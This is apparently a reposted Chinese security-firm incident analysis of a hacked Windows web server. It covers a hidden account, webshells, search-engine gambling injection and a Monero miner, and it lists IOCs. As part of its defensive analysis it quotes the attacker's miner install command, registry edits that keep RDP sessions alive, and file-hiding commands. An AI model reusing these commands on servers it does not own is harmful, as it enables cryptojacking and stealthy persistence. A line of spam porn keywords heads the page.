免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版

前言

本文是前段時間處理某用戶被黑的分析總結，用戶被黑的表現(xiàn)是使用爬蟲訪問用戶網(wǎng)站的首頁時會出現(xiàn)博彩關鍵字，而使用正常瀏覽器訪問時無相關的博彩關鍵詞。這是典型的黑帽SEO的表現(xiàn)，針對這種技術，前期文章已有相關分析，感興趣的同學可以看一看。

此次分析，發(fā)現(xiàn)用戶的服務器被多波不同利益的黑客入侵，里面有一些比較有意思的內容，所以特意分析總結了一下。

一、概述

1、分析結果

經(jīng)過分析，目前得到以下結論：

1）服務器上存在博彩信息與挖礦程序，說明被多波不同利益團隊的黑客入侵；
2）此服務器于2018年9月21日被黑客入侵后加上相應的博彩內容，相應的IP為175.41.27.93；
3）此服務器在2016年2月份甚至更早就已經(jīng)被黑客植入網(wǎng)馬了；
4）服務器在2017年12月19日被植入挖礦程序；
5）系統(tǒng)被增加了隱藏賬號test$，并且在2018年9月21日14:38發(fā)現(xiàn)賬號guest有IP為212.66.52.88，地理位置為烏克蘭登錄的情況。

二、分析過程

2.1 入侵現(xiàn)象

2018年9月份，通過我司監(jiān)測平臺監(jiān)測到某網(wǎng)站被植入博彩內容，具體如下：

網(wǎng)站被植入博彩信息

網(wǎng)站被植入博彩基本上說明網(wǎng)站被黑客入侵，我司“捕影”應急響應小組立即協(xié)助用戶進行入侵分析。

2.2 系統(tǒng)分析

系統(tǒng)分析主要用于分析其系統(tǒng)賬號、進程、開放端口、連接、啟動項、文件完整性、關鍵配置文件等，通過系統(tǒng)相關項的分析判斷其系統(tǒng)層面是否正常。對其系統(tǒng)層面分析，發(fā)現(xiàn)以下層面存在問題：

系統(tǒng)賬號

對系統(tǒng)賬號的分析，目前發(fā)現(xiàn)系統(tǒng)存在以下賬號：

其中test$明顯為隱藏賬號，一般情況下系統(tǒng)管理員不會增加隱藏賬號，該賬號肯定為黑客增加。另外幾個賬號，如zhimei、renjian等為可疑賬號，需要管理人員進行確認。

系統(tǒng)賬號情況

管理員信息

管理員組中存在administrator和guest，一般情況下guest為來賓賬號，不會增加到管理員組中，懷疑該賬號為黑客增加到管理員組中。

系統(tǒng)賬號存在兩個問題：

1）服務器被增加test$隱藏賬號
2）Guest賬號被加入到管理員組中

日志分析

通過相關安全產(chǎn)品的日志，可以看到guest賬號于2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄，該賬號密碼肯定已泄露，建議禁用該賬號。

進程與服務分析

對其服務器分析，發(fā)現(xiàn)其服務器的CPU利用率非常高，利用率為100%。發(fā)現(xiàn)主要被SQLServer.exe占用。

CPU利用率為100%

SQLServer.exe占用CPU最高

找到該程序所在的目錄，發(fā)現(xiàn)該程序放在C:\ProgramData\MySQL目錄下，并且被目錄被隱藏。里面有四個文件，兩個bat文件，兩個exe文件。

【Startservice.bat功能分析】

對startservice.bat進行分析，其內容如下：

其功能如下：

1）set SERVICE_NAME=SystemHost，指定其服務名為SystemHost：

2）Tomcat9 install'%SERVICE_NAME%' SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt

7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0

使用Tomcat9 安裝相應的挖礦程序，挖礦參數(shù)分析：

礦池網(wǎng)站

黑客挖XMR數(shù)量

挖礦程序被植入時間

3）Set ProcessName=SQLServer.exe指定進程名為SQLServer.exe：

4）attrib +h +r %cd%\*.*

作用：將該目錄下的所有文件隱藏

5） reg add 'HKLM\system\CurrentControlSet\Control\Terminal Server

\WinStations\RDP-Tcp' /v 'MaxConnectionTime'/t REG_DWORD /d 0x1 /f

reg add'HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp' /v 'MaxDisconnectionTime' /tREG_DWORD /d 0x0 /f

reg add'HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp' /v 'MaxIdleTime' /t REG_DWORD /d 0x0/f

功能:配置注冊表，作用為使遠程連接永不超時。

6） net accounts /forcelogoff:no

功能: 防止強制注銷用戶

【mHi.bat功能分析】

mHi.bat的功能如下：

1）將c:\ProgramData及C:\ProgramData\MySQL隱藏，防止安全人員發(fā)現(xiàn)；

2）指定C:\ProgramData\MySQL、C:\WINDOWS\Tasks\AdobeFlash Player Updater.job、C:\WINDOWS\Tasks\GoogleUpdateTaskMashine.job相關文件的訪問控制權限，僅允許SYSTEM組用戶完全控制：

mHi.bat功能

calcls功能

【SQLServer.exe功能分析】

子進程，主要功能用來挖礦

【Tomcat9.exe功能分析】

1）SQLServer.exe的父進程，用來守護SQLServer.exe,

2）SQLServer.exe一旦被關閉，會立即啟動SQLServer.exe

【功能總結】

通過以上分析，可以看出，黑客增加的四個文件的主要作用如下：

【應急處置】

直接關閉SQLServer.exe,該程序立馬啟動。由于其存在父進程，直接查找父進程，命令如下：wmic process whereName='SQLServer.exe' get ParentProcessID：

開放端口

對其該服務器進行分析，發(fā)現(xiàn)該服務器開放以下端口：

端口開放情況

端口開放情況

建議關閉 21 、 135 、 445 、 8080 等端口，其他端口需要根據(jù)業(yè)務需求來決定是否關閉。

其他分析

對該服務器的連接、安裝軟件、關鍵配置文件、啟動項分析，目前未發(fā)現(xiàn)異常。

分析結論

通過對系統(tǒng)層面分析，其服務器系統(tǒng)層面主要存在以下問題：

1）服務器被增加test$隱藏賬號

2）Guest賬號被加入到管理員組中

3）guest賬號于2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄，該賬號密碼已泄露，目前已禁用該賬號

4）端口開放過多，其中21、135、445、8080等端口建議關閉

5）2017年12月19日已被植入挖礦程序

2.3 應用分析

博彩頁面分析

【技術原理】

通過內容分析，發(fā)現(xiàn)此次黑客為SEO性質的。其主要目的在于通過黑帽SEO獲取經(jīng)濟利益，一般情況下，黑客植入博彩內容有以下途徑：

前端劫持

前端劫持一般都是在網(wǎng)站的相應頁面中插入JS腳本，通過JS來進行跳轉劫持。也有發(fā)現(xiàn)黑客直接修改相應的頁面內容的。

服務器端劫持

服務器端劫持也稱為后端劫持，其是通過修改網(wǎng)站動態(tài)語言文件,如global.asax、global.asa、conn.asp、conn.php這種文件。這些文件是動態(tài)腳本每次加載時都會加載的配置文件，如訪問x.php時會加載conn.php。這樣的話，只需要修改這些全局的動態(tài)腳本文件(如global.asax)，訪問所有的aspx文件時都會加載這個global.asax文件，可以達到全局劫持的效果。

針對以上兩種劫持技術，可以直接查看我前期的技術分析：http://www.freebuf.com/articles/web/153788.html

【博彩分析】

通過頁面分析判斷為在服務器端劫持，服務器端劫持一般是修改全局配置文件，如global.asax、global.asa、conn.asp、conn.php。

通過對該服務器分析，發(fā)現(xiàn)其修改config_global.php該文件。植入如下內容：

這里面黑客將相應的劫持內容進行base64加密了，將其中base64加密的內容進行base64解密，得到以下內容：

其中 function isSpider()函數(shù)主要用來判斷是否為爬蟲訪問，爬蟲的瀏覽器特征如下：

$bots= array(                   ‘baidu’        => ‘baiduspider’,                   ‘sogou’        => ‘sogou’,                   ‘360spider’        => ‘haosouspider’,                   ‘360spider’        => ‘360spider’,                   ‘bingbot’        => ‘bingbot’,                   ‘Yisou’        => ‘Yisouspider’,

如果是爬蟲則返回http://l5.wang2017.com/相關的內容。

【應急處置】

處置的話比較簡單，直接將黑客增加的base64加密的內容刪除即可，刪除相關內容以后，訪問正常。

Webshell分析

Webshell主要是網(wǎng)馬，其作用為通過webshell可以控制整個服務器，并進行系統(tǒng)級別的操作，使用D盾對服務器查殺，發(fā)現(xiàn)存在23個webshell。

webshell

Webshell主要是網(wǎng)馬，其作用為通過webshell可以控制整個服務器，并進行系統(tǒng)級別的操作，使用D盾對服務器查殺，發(fā)現(xiàn)存在23個webshell。

webshell

選擇部分其代碼如下：

201806r4kfjtv4zexnvfbf.jpg圖片馬

針對網(wǎng)站發(fā)現(xiàn)的23個webshell，目前相關webshell均已刪除。

2.4 日志分析

未找到有效日志，無法分析入侵原因及途徑。

三、IOC

3.1 IP

212.66.52.88
175.41.27.93

3.2 URL

http://l5.wang2017.com

3.3 樣本MD5

70D9E2761B18CB0E4C4051E905F9E7A5
EA9F0B1E88B5E21B9A9D31D5C46E81D7
A3CD992FDDC2300AD8A23AD16FE3725C
A8ADE1F8D0D87E4D7A75919EE6B3740F
58A9B144762916FE227AF329F5D384F1
DBBB0ACE277D955833696F06C610DE2E
7F7D78755E070860EFFFD1272F14C7A7
9A5772ED22973DA02A45872BBC3735F2
E276D34B3AE124E8218CBC32B4D341B2
B663F32281526B17A540655EC05EC9EC
0D66C67B8BEC9627B696DEB275862E72
634630797CACCC334EFF054FE6279E91
AB908A995367FF0055DFF903F515B061
5D52847EC2CCC750951EF0765AEEC17B
249D7774648FB1CD309AA23B3F96430B
C13D2297D244D398B6A311DDA87DBDC7
C23206B81B06D64933C5FBC24AF69CF6
E14E6B1629ED5079F55B69DF66EDAFD7
8D01D604794D3494CBB31570B1E54182
2A235990DD38A0BCBAF2C4835EB8C0A3
5D568BC15EE4D861583E68B63762C2B1
0D66C67B8BEC9627B696DEB275862E72

3.4 礦池地址

stratum+tcp://pool.minexmr.com:7777

3.5 錢包地址

本文作者：feiniao，本文轉自FreeBuf.COM

“寒冬”已至，名企老專家告訴你運維該如何轉型

各大名企專家 GOPS 深圳站親自傳授大廠經(jīng)驗

精彩日程一覽 ▼

GOPS 2019 · 深圳站亮點視頻